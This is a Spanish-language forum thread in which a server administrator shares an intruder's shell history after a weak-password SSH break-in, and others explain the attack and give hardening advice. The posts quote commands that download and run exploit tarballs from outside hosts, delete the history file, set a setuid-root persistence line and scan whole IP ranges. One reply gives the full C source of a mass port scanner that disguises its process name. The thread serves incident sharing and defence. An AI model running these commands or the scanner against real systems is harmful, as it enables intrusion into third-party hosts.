Este Cracker mal nacido (no se burlen, que les puede tocar peor, oajala q no asi que PILAS) DEBEN LEERLO

Imagen de BitFrost

Forums: 

Por un error, y por hacer caso de poner la clave admin:admin, tengo a este famoso metido en un servidor, y adiven que es lo que hace:

Al pricipio examinando el correo y el Logwath encuentro que usuario admin ha ingresado correctamente mediante SSH, por lo cual inmediatamente cambio esa @##~|~||€~# clave

Segundo reviso lo que este hdp hace en bash_history, si alguien tiene tiempo y puede averiguar para que sirven los archivos que este hdp utiliza me ayudarian bastante a resolver el problema en el que estoy, miren esto

w
passwd
id
uname -a
wget http://powercomm.iquebec.com/xpls
tar -zxvf xpls
rm -rf xpls
cd nixexp
ls
./jt
cd ..
rm -rf nixexp
ls
ls -al
rm -rf .bash_history
cat /proc/cpuinfo
wget http://oitech69.iquebec.com/oissh.tar
tar -xvf oissh.tar
rm -rf oissh.tar
ls
cd ssh
ls
rm -rf vuln.txt
ls
chmod +x *
ls
./scan 168.10;./scan 216.63;./scan 211.0;./scan 200.237;./scan 200.61;./scan 190.11;./scan 190.12;./scan 190.13;./scan 190.14;./scan 190.15;./scan 193.194;./scan 207.61;./scan 60.56;./scan 64.12;./scan 60.255;./scan 210.177
ls
w

y ahora en ese servidor no tengo internet, pero si coneccion ssh y tengo miles de mails que me dicen

Message 2060:
From root@servidor.XXXXX.com Thu Jun 21 10:44:01 2007
Date: Thu, 21 Jun 2007 10:44:01 -0500
From: root@servidor.XXXX.com (Cron Daemon)
To: root@servidor.XXXXX.com
Subject: Cron chown root:root /home/admin/nixexp/jt && chmod 4755 /home/admin/nixexp/jt && rm -rf /etc/cron.d/core && kill -USR1 7090
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:

chown: cannot access `/home/admin/nixexp/jt': No such file or directory

QUE HDP desocupadito

bueno lo9s exploits no los

Imagen de palichis

bueno lo9s exploits no los puedo postear porque son binarios lo que posteare son los archivos para scanear la red que se usaron para esto


/*
** pscan.c - Originally by Volatile
** modified by riksta, lizard
**
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_SOCKETS 800
#define TIMEOUT 3

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

FILE *outfd;
int tot = 0;

int main(int argc, char *argv[])
{
int done = 0, i, cip = 1, bb = 0, ret, k, ns, x;
time_t scantime;
char ip[20], outfile[128], last[256];

if (argc < 3)
{
printf("Usage: %s [c-block]\n", argv[0]);
exit(EXIT_FAILURE);
}

memset(&outfile, 0, sizeof(outfile));
if (argc == 3)
snprintf(outfile, sizeof(outfile) - 1, "scan.log", argv[1], argv[2]);
else if (argc >= 4)
{
snprintf(outfile, sizeof(outfile) - 1, "scan.log", argv[1], argv[3], argv[2]);
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}
strcpy(argv[0],"/bin/bash");
if (!(outfd = fopen(outfile, "a")))
{
perror(outfile);
exit(EXIT_FAILURE);
}
printf("# scanning: ", argv[1]);
fflush(stdout);

memset(&last, 0, sizeof(last));
init_sockets();
scantime = time(0);

while(!done)
{
for (i = 0; i < MAX_SOCKETS; i++)
{
if (cip == 255)
{
if ((bb == 255) || (argc >= 4))
{
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++)
{
if (connlist[k].status > S_NONE)
{
ns++;
break;
}
}

if (ns == 0)
done = 1;

break;
}
else
{
cip = 0;
bb++;
for (x = 0; x < strlen(last); x++)
putchar('\b');
memset(&last, 0, sizeof(last));
snprintf(last, sizeof(last) - 1, "%s.%d.* (total: %d) (%.1f%% done)",
argv[1], bb, tot, (bb / 255.0) * 100);
printf("%s", last);
fflush(stdout);
}
}

if (connlist[i].status == S_NONE)
{
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s == -1)
printf("Unable to allocate socket.\n");
else
{
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1)
{
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else
{
memset(&ip, 0, 20);
sprintf(ip, "%s.%d.%d", argv[1], bb, cip);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(atoi(argv[2]));
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
cip++;
}
}
}
}
check_sockets();
}

printf("\n# pscan completed in %u seconds. (found %d ips)\n", (time(0) - scantime), tot);
fclose(outfd);
exit(EXIT_SUCCESS);
}

void init_sockets(void)
{
int i;

for (i = 0; i < MAX_SOCKETS; i++)
{
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in));
}
return;
}

void check_sockets(void)
{
int i, ret;

for (i = 0; i < MAX_SOCKETS; i++)
{
if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING))
{
close(connlist[i].s);
connlist[i].status = S_NONE;
}
else if (connlist[i].status == S_CONNECTING)
{
ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1)
{
if (errno == EISCONN)
{
tot++;
fprintf(outfd, "%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr));
close(connlist[i].s);
connlist[i].status = S_NONE;
}

if ((errno != EALREADY) && (errno != EINPROGRESS))
{
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else
{
tot++;
fprintf(outfd, "%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr));
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}

void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++)
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
fclose(outfd);
exit(EXIT_FAILURE);
}

algunos de los exploits estan disponibles en la web

Imagen de acl

por ejemplo, pueden buscar h00lyshit.c en google y les llevara al codigo fuente. Aparentemente la mayoria de estos intenta explotar condiciones de carrera, o desbordamientos para obtener permisos de root.

Lo que hizo este gusano (adjetivo que se aplica tanto a si fuera un hominido como si fuera un programa quien esta detras de esto) es escanearte los puertos, encontro ssh abierto e intento miles de combinaciones de login/pass. Cuando encontro una y obtuvo shell, se bajo los tars de los expliots y otro con escaneadores de red, corrio uno de los exploits, se hizo root y luego intento borrar sus pasos e instalo los escaneadores bajo cron. Tambien agrego algunas cosas mas que ya habias puesto.

Ojala sea solo un Worm

Imagen de BitFrost

No quisiera tomarlo en lo personal, recien me estoy curando de una fuerte faringoamigdalitis, pero la culpa fue mia por no poner atencion, lamentablemente olvide que esas claves estaban creadas, ahora me toca formatear el server.

Como dicen Mess with the best die like the rest, pero ahora que estoy enfermo recien puedo escribir ahora que se arreglo el problema de la fibra rota por ahi, eso creo

El punto es que deben de tener cuidado en exponer sus servidores a internet, por mas simple que parescan pueden ser utilizados para hacer un ataque relay hacia otros hosts inocentes.

Como siempre aprendi a la mala

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

No lo tomes como un ataque a tu persona

Imagen de acl

[quote]El punto es que deben de tener cuidado en exponer sus servidores a internet, por mas simple que parescan pueden ser utilizados para hacer un ataque relay hacia otros hosts inocentes.[/quote]

Lo que dices es muy cierto. Ya no se pueden aplicar excusas como "quien va a querer invadirnos, si somos tan chicos?", todos quienes tienen un enlace a internet (incluso con enlaces de 1200 baudios) tienen algo valioso: ancho de banda y capacidad de procesamiento, y los delicuentes no distinguen entre agencias grandes, compañias multinacionales, el cafe net de la esquina o la compu de tus tíos. Solamente ven ips que atacan, explotan y utilizan, no somos mas que un numero para esta escoria.

Nadie esta exento y gracias a Internet, tenemos acceso a una buena cantidad de informacion acerca de tecnicas de proteccion, avances, avisos tempranos y herramientas (que encima nos regalan) para evitar ser victimas. Ya no hay excusas.

Es cierto que cuando lo detectas un evento como esto, lo mas normal es que te hierva el buche de las iras. Pero la mejor forma de reaccionar es con la cabeza y no tomarlo como un ataque a tu persona. Documenta lo que has visto y compartelo con otros (reaccionaste bien, segun parece) y aprende de tus errores. No seras la primera ni la unica ni la ultima victima (al menos hasta que se implemente universalmente el rfc3514...). Preparate para las proximas arremetidas e intenta disfrutar el estimulo intelectual que la seguridad brinda.

Alguna vez me pasó lo

Imagen de antares

Alguna vez me pasó lo mismo, en un servidor de correos, entró usando una contraseña débil de unas de las cuentas. Francamente creí haber puesto de bash a todas las cuentas a /sbin/false, y en verdad así estaban todas menos UNA, lechón el maldito cracker, entró usando esa cuenta.

Simplemente le quite bash, cambié claves, analicé rootkits, y listo, a seguir trabajando. Este tipo de historias es más frecuente de lo que creen, es por eso que cualquier medida de seguridad que implementen no es paranoia, es ser precavido. Por cierto, lo detecté rápido porque el spammer me consumía todo el canal de internet, alguien más pilas en eso hubiese pasado invisible más tiempo.

Saludos.

Saludos,

antares

Páginas